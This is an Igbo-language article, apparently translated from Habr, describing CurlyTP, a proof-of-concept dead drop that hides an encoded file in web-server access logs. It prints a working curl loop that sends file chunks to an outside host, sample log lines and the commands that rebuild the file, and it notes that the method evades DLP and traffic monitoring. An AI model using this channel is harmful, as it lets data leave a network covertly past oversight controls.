Dị ka nkọwa Wikipedia si kwuo, mwụda nwụrụ anwụ bụ ngwá ọrụ na-agba izu nke na-eme mgbanwe ozi ma ọ bụ ihe ụfọdụ n'etiti ndị mmadụ na-eji ebe nzuzo. Echiche a bụ na ndị mmadụ anaghị ezute - mana ha ka na-agbanwe ozi iji kwado nchekwa ọrụ.
Ebe nzuzo ekwesịghị ịdọrọ uche. Ya mere, n'ụwa na-anọghị n'ịntanetị, ha na-ejikarị ihe ndị nwere uche eme ihe: brik na-adịghị mma na mgbidi, akwụkwọ ọbá akwụkwọ, ma ọ bụ oghere n'ime osisi.
Enwere ọtụtụ ngwa nzuzo na nzuzo na ịntanetị, mana eziokwu nke iji ngwaọrụ ndị a na-adọta uche. Na mgbakwunye, enwere ike igbochi ha na ọkwa ụlọ ọrụ ma ọ bụ gọọmentị. Ihe a ga-eme?
Onye nrụpụta Ryan Flowers tụpụtara nhọrọ na-atọ ụtọ - . Ọ bụrụ na ị na-eche maka ya, gịnị ka sava weebụ na-eme? Na-anata arịrịọ, na-ewepụta faịlụ ma na-ede ndekọ. Ọ na-edekọ arịrịọ niile, ọbụna ndị na-ezighị ezi!
Ọ tụgharịrị na sava weebụ ọ bụla na-enye gị ohere ịchekwa ozi ọ bụla na ndekọ. Okooko osisi na-eche ka esi eji nke a.
Ọ na-enye nhọrọ a:
- Were faịlụ ederede (ozi nzuzo) wee gbakọọ hash (md5sum).
- Anyị na-etinye koodu ya (gzip+uuencode).
- Anyị na-eji arịrịọ ezighi ezi na ihe nkesa anyị na-ede na log.
Local:
[root@local ~]# md5sum g.txt
a8be1b6b67615307e6af8529c2f356c4 g.txt
[root@local ~]# gzip g.txt
[root@local ~]# uuencode g.txt > g.txt.uue
[root@local ~]# IFS=$'n' ;for x in `cat g.txt.uue| sed 's/ /=+=/g'` ; do echo curl -s "http://domain.com?transfer?g.txt.uue?$x" ;done | shIji gụọ faịlụ, ịkwesịrị ịrụ ọrụ ndị a n'usoro ọzọ: decode na wepụ faịlụ ahụ, lelee hash (nwere ike ibunye hash n'enweghị nsogbu na ọwa mepere emepe).
A na-eji dochie oghere =+=nke mere na enweghi oghere na adreesị. Mmemme a, nke onye ode akwụkwọ kpọrọ CurlyTP, na-eji ntinye koodu base64, dị ka mgbakwunye email. A na-eji isi okwu mee arịrịọ a ?transfer?ka onye nnata wee nwee ike ịchọta ya na ndekọ.
Kedu ihe anyị na-ahụ na ndekọ na nke a?
1.2.3.4 - - [22/Aug/2019:21:12:00 -0400] "GET /?transfer?g.gz.uue?begin-base64=+=644=+=g.gz.uue HTTP/1.1" 200 4050 "-" "curl/7.29.0"
1.2.3.4 - - [22/Aug/2019:21:12:01 -0400] "GET /?transfer?g.gz.uue?H4sICLxRC1sAA2dpYnNvbi50eHQA7Z1dU9s4FIbv8yt0w+wNpISEdstdgOne HTTP/1.1" 200 4050 "-" "curl/7.29.0"
1.2.3.4 - - [22/Aug/2019:21:12:03 -0400] "GET /?transfer?g.gz.uue?sDvdDW0vmWNZiQWy5JXkZMyv32MnAVNgQZCOnfhkhhkY61vv8+rDijgFfpNn HTTP/1.1" 200 4050 "-" "curl/7.29.0"Dịka ekwurula, iji nweta ozi nzuzo ị ga-arụ ọrụ ahụ n'usoro ọzọ:
Remote machine
[root@server /home/domain/logs]# grep transfer access_log | grep 21:12| awk '{ print $7 }' | cut -d? -f4 | sed 's/=+=/ /g' > g.txt.gz.uue
[root@server /home/domain/logs]# uudecode g.txt.gz.uue
[root@server /home/domain/logs]# mv g.txt.gz.uue g.txt.gz
[root@server /home/domain/logs]# gunzip g.txt.gz
[root@server /home/domain/logs]# md5sum g
a8be1b6b67615307e6af8529c2f356c4 gUsoro dị mfe iji akpaaka. Md5sum dakọtara, na ọdịnaya dị na faịlụ ahụ na-egosi na emeziri ihe niile nke ọma.
Usoro dị nnọọ mfe. "Isi ihe omume a bụ naanị iji gosi na enwere ike ibufe faịlụ site na obere arịrịọ weebụ na-emeghị ihe ọjọọ, ọ na-arụkwa ọrụ na sava weebụ ọ bụla nwere ndekọ ederede doro anya. N'ụzọ bụ isi, sava weebụ ọ bụla bụ ebe ezoro ezo!” ka Flowers dere.
N'ezie, usoro a na-arụ ọrụ naanị ma ọ bụrụ na onye nnata nwere ike ịnweta ndekọ ihe nkesa. Mana ohere dị otú ahụ ka a na-enye, dịka ọmụmaatụ, site na ọtụtụ ndị nnabata.
Kedu ka esi eji ya?
Ryan Flowers na-ekwu na ọ bụghị ọkachamara nchekwa ozi na ọ gaghị achịkọta ndepụta enwere ike iji CurlyTP. Maka ya, ọ bụ naanị ihe akaebe nke echiche na ngwaọrụ ndị a maara nke ọma anyị na-ahụ kwa ụbọchị nwere ike iji mee ihe n'ụzọ na-adịghị mma.
N'ezie, usoro a nwere ọtụtụ uru karịa ihe nkesa ndị ọzọ "na-ezo" dị ka ma ọ bụ : ọ dịghị achọ nhazi pụrụ iche n'akụkụ ihe nkesa ma ọ bụ usoro ọ bụla pụrụ iche - ọ gaghị eme ka enyo n'etiti ndị na-enyocha okporo ụzọ. O yighị ka usoro SORM ma ọ bụ DLP ga-enyocha URL maka faịlụ ederede abịakọrọ.
Nke a bụ otu n'ime ụzọ isi nyefee ozi site na faịlụ ọrụ. Ị nwere ike icheta ka ụfọdụ ụlọ ọrụ ndị toro eto na-etinyebu ma ọ bụ na koodu nke ibe HTML.
Echiche bụ na ọ bụ naanị ndị mmepe weebụ ga-ahụ akwa Ista a, ebe ọ bụ na onye nkịtị agaghị ele isi nkụnye eji isi mee ma ọ bụ koodu HTML.
isi: www.habr.com